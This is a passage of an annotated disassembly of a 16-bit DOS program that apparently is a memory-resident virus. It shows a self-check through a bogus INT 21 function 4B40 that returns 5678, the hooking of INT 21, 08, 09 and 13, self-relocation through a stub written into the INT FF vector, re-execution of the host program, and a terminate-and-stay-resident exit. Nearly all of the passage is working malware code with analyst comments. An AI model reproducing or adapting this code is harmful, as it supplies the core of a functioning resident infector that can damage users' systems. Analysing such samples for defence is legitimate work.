DS,AX 0C15 A11304 MOV AX,[0413] ;Memory size in KByte 0C18 B106 MOV CL,06 0C1A D3E0 SHL AX,CL 0C1C 8ED8 MOV DS,AX ;DS = A000 or 9E00 0C1E 33F6 XOR SI,SI 0C20 8B443E MOV AX,[SI+3E] 0C23 3DCB3C CMP AX,3CCB 0C26 7434 JZ 0C5C 0C28 833E400EFE CMP [0E40],FFFE ;(data in Boot Sector) 0C2D 7404 JZ 0C33 0C2F F9 STC 0C30 EB4E JMP 0C80 0C32 90 NOP 0C33 FA CLI 0C34 B8404B MOV AX,4B40 ;Load Or Exec Program 0C37 CD21 INT 21 ; !!! AL = 40 ist false call 0C39 3D7856 CMP AX,5678 ;Error code = 5678 ? 0C3C 741A JZ 0C58 ; Yes - allready loaded 0C3E C6067B0F01 MOV [0F7B],01 ; No - Set "Dos complet" flag 0C43 90 NOP 0C44 FB STI 0C45 B82135 MOV AX,3521 ;Get INT 21 addres 0C48 CD21 INT 21 0C4A 891ED006 MOV [06D0],BX ;Store INT 21 Orig addres 0C4E 8C06D206 MOV [06D2],ES 0C52 BAD406 MOV DX,06D4 ;(? New Offset of INT 21 ?) 0C55 B82125 MOV AX,2521 0C58 F8 CLC 0C59 EB25 JMP 0C80 0C5B 90 NOP 0C5C C7443EFEFF MOV [SI+3E],FFFE 0C61 33C0 XOR AX,AX 0C63 8ED8 MOV DS,AX 0C65 8EC0 MOV ES,AX 0C67 BE0402 MOV SI,0204 ;Set int vector 08 from 81 0C6A BF2000 MOV DI,0020 0C6D B90200 MOV CX,0002 0C70 FA CLI 0C71 F3A5 REP MOVSW 0C73 FB STI 0C74 BE0C02 MOV SI,020C ;Set int vector 13 from 83 0C77 BF4C00 MOV DI,004C 0C7A B90200 MOV CX,0002 0C7D F3A5 REP MOVSW 0C7F F9 STC 0C80 07 POP ES 0C81 1F POP DS 0C82 C3 RET ;--------------------------------------------------------------------------- 0C83 E889FF CALL 0C0F 0C86 7203 JC 0C8B 0C88 EB0B JMP 0C95 0C8A 90 NOP 0C8B B8404B MOV AX,4B40 ;Load or Execute Program 0C8E CD21 INT 21 ; !!! AL = 40 ist false call 0C90 3D7856 CMP AX,5678 ;Error code = 5678 ? 0C93 7513 JNZ 0CA8 ; No - 0C95 B8414B MOV AX,4B41 ; Yes - 0C98 BF0001 MOV DI,0100 0C9B 2E8B8D2400 MOV CX,CS:[DI+0024] ; 0CA0 BE0010 MOV SI,1000 0CA3 03F7 ADD SI,DI 0CA5 FC CLD 0CA6 CD21 INT 21 ; 0CA8 8CC8 MOV AX,CS 0CAA 051000 ADD AX,0010 0CAD 8ED0 MOV SS,AX 0CAF BCEE0D MOV SP,0DEE 0CB2 50 PUSH AX 0CB3 B8B80B MOV AX,0BB8 0CB6 50 PUSH AX 0CB7 CB RET Far ;>> Goto 0CB8 ;--------------------------------------------------------------------------- 0CB8 FC CLD 0CB9 06 PUSH ES 0CBA E852FF CALL 0C0F 0CBD 2E8C062600 MOV CS:[0026],ES 0CC2 2E8C068100 MOV CS:[0081],ES 0CC7 2E8C068500 MOV CS:[0085],ES 0CCC 2E8C068900 MOV CS:[0089],ES 0CD1 8CC0 MOV AX,ES 0CD3 051000 ADD AX,0010 0CD6 2E01065400 ADD CS:[0054],AX 0CDB 2E01065600 ADD CS:[0056],AX 0CE0 B8404B MOV AX,4B40 ; 0CE3 CD21 INT 21 ; 0CE5 3D7856 CMP AX,5678 ; 0CE8 7513 JNZ 0CFD 0CEA 07 POP ES 0CEB 2E8E165600 MOV SS,CS:[0056] 0CF0 2E8B265000 MOV SP,CS:[0050] 0CF5 E89EFE CALL 0B96 ;Zero registers 0CF8 2EFF2E5200 JMP Far CS:[0052] 0CFD E873FE CALL 0B73 ;Decode Text 0D00 E89EFE CALL 0BA1 ;Detect speed of machine 0D03 33C0 XOR AX,AX 0D05 8EC0 MOV ES,AX 0D07 26A1FC03 MOV AX,ES:[03FC] ;Save INT FF Ofs into 0028 0D0B 2EA32800 MOV CS:[0028],AX 0D0F 26A0FE03 MOV AL,ES:[03FE] ;Save INT FF Seg (Lo) into 002A 0D13 2EA22A00 MOV CS:[002A],AL 0D17 26C706FC03F3A5 MOV ES:[03FC],A5F3 ;0000:03FC = F3 A5 -> REP MOVSW 0D1E 26C606FE03CB MOV ES:[03FE],CB ; 03FE = CB -> RET Far 0D24 58 POP AX ; +---+---+ 0D25 051000 ADD AX,0010 ; 0D28 8EC0 MOV ES,AX ; 0D2A 0E PUSH CS ; Move from DS:0 to ES:0 0D2B 1F POP DS ; 800 word 0D2C B90010 MOV CX,1000 ; 0D2F D1E9 SHR CX,1 ; 0D31 33F6 XOR SI,SI ; 0D33 8BFE MOV DI,SI ; 0D35 06 PUSH ES ; 0D36 B83F0C MOV AX,0C3F ; 0D39 50 PUSH AX ; 0D3A EAFC030000 JMP 0000:03FC ; + ; | 0D3F 8CC8 MOV AX,CS ; <--+ 0D41 8ED0 MOV SS,AX 0D43 BCEE0D MOV SP,0DEE 0D46 33C0 XOR AX,AX 0D48 8ED8 MOV DS,AX 0D4A 2EA12800 MOV AX,CS:[0028] ;Restore INT FF Ofs 0D4E A3FC03 MOV [03FC],AX 0D51 2EA02A00 MOV AL,CS:[002A] ;Restore INT FF Seg (Lo) 0D55 A2FE03 MOV [03FE],AL 0D58 BB0010 MOV BX,1000 0D5B B104 MOV CL,04 0D5D D3EB SHR BX,CL 0D5F 83C340 ADD BX,0040 0D62 B44A MOV AH,4A ;Modify memory allocation 0D64 2E8E062600 MOV ES,CS:[0026] 0D69 CD21 INT 21 0D6B B82135 MOV AX,3521 ;Get INT 21 vector 0D6E CD21 INT 21 0D70 2E891ED006 MOV CS:[06D0],BX ;Store it 0D75 2E8C06D206 MOV CS:[06D2],ES 0D7A 0E PUSH CS 0D7B 1F POP DS 0D7C BAD406 MOV DX,06D4 ;Set INT 21 vector 0D7F B82125 MOV AX,2521 0D82 CD21 INT 21 0D84 8E062600 MOV ES,[0026] 0D88 268E062C00 MOV ES,ES:[002C] ;Segment of DOS ENVRONMENT string 0D8D 33FF XOR DI,DI 0D8F B9FF7F MOV CX,7FFF 0D92 32C0 XOR AL,AL 0D94 F2AE REPNZ SCASB 0D96 263805 CMP ES:[DI],AL 0D99 E0F9 LOOPNZ 0D94 0D9B 8BD7 MOV DX,DI 0D9D 83C203 ADD DX,0003 0DA0 B8004B MOV AX,4B00 0DA3 06 PUSH ES 0DA4 1F POP DS 0DA5 0E PUSH CS 0DA6 07 POP ES 0DA7 BB7D00 MOV BX,007D 0DAA 1E PUSH DS 0DAB 06 PUSH ES 0DAC 50 PUSH AX 0DAD 53 PUSH BX 0DAE 51 PUSH CX 0DAF 52 PUSH DX 0DB0 0E PUSH CS 0DB1 1F POP DS 0DB2 B80835 MOV AX,3508 ;Get INT 08 vector 0DB5 CD21 INT 21 0DB7 891E2103 MOV [0321],BX ;Stor it 0DBB 8C062303 MOV [0323],ES 0DBF BAEC02 MOV DX,02EC ; 0DC2 E80FFE CALL 0BD4 0DC5 B80825 MOV AX,2508 ;Set INT 08 0DC8 CD21 INT 21 0DCA B80935 MOV AX,3509 ;Get INT 09 vector 0DCD CD21 INT 21 0DCF 891E0600 MOV [0006],BX ;Store it 0DD3 8C060800 MOV [0008],ES 0DD7 BAB103 MOV DX,03B1 ;Set INT 09 vector 0DDA B80925 MOV AX,2509 0DDD CD21 INT 21 0DDF B81335 MOV AX,3513 ;Get INT 13 vector 0DE2 CD21 INT 21 0DE4 891E0A00 MOV [000A],BX ;Store it 0DE8 8C060C00 MOV [000C],ES 0DEC BA2605 MOV DX,0526 ;Set INT 13 vector 0DEF B81325 MOV AX,2513 0DF2 CD21 INT 21 0DF4 5A POP DX 0DF5 59 POP CX 0DF6 5B POP BX 0DF7 58 POP AX 0DF8 07 POP ES 0DF9 1F POP DS 0DFA 9C PUSHF 0DFB 2EFF1ED006 CALL Far CS:[06D0] 0E00 1E PUSH DS 0E01 07 POP ES 0E02 B449 MOV AH,49 ;Free allocated memory 0E04 CD21 INT 21 0E06 B44D MOV AH,4D ;Get return code of subprocess 0E08 CD21 INT 21 0E0A B431 MOV AH,31 ;Terminate And Stay Resident 0E0C BA0010 MOV DX,1000 0E0F B104 MOV CL,04 0E11 D3EA SHR DX,CL 0E13 83C240 ADD DX,0040 0E16 CD21 INT 21 ;---------------------------------------------------------------------------